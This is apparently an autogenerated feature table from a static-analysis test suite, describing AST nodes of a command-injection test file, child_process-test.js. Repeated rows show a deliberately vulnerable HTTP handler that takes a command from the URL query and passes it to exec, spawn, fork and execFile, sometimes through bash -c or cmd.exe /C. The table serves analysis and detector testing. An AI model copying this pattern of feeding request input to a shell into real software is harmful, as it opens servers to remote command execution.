flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:8:12:12 | spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:8:12:12 | spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:14:12:18 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:16 | cp.spawnSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:16 | cp.spawnSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:16 | cp.spawnSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:16 | cp.spawnSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:16 | cp.spawnSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | exceptional return of cp.spawnSync("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | exceptional return of cp.spawnSync("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | exceptional return of cp.spawnSync("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | exceptional return of cp.spawnSync("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | exceptional return of cp.spawnSync("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:8:13:16 | spawnSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:8:13:16 | spawnSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:8:13:16 | spawnSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:8:13:16 | spawnSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:8:13:16 | spawnSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | CalleeFlexibleAccessPath | cp.spawnSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:18:13:22 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:11 | cp.fork | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:11 | cp.fork | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:11 | cp.fork | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:11 | cp.fork | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:11 | cp.fork | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | exceptional return of cp.fork("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | exceptional return of cp.fork("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | exceptional return of cp.fork("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | exceptional return of cp.fork("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | exceptional return of cp.fork("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:8:14:11 | fork | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:8:14:11 | fork | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:8:14:11 | fork | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:8:14:11 | fork | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:8:14:11 | fork | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | CalleeFlexibleAccessPath | cp.fork | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:13:14:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | exceptional return of cp.exec(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | exceptional return of cp.exec(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | exceptional return of cp.exec(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | exceptional return of cp.exec(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | exceptional return of cp.exec(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:8:17:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:8:17:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:8:17:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd 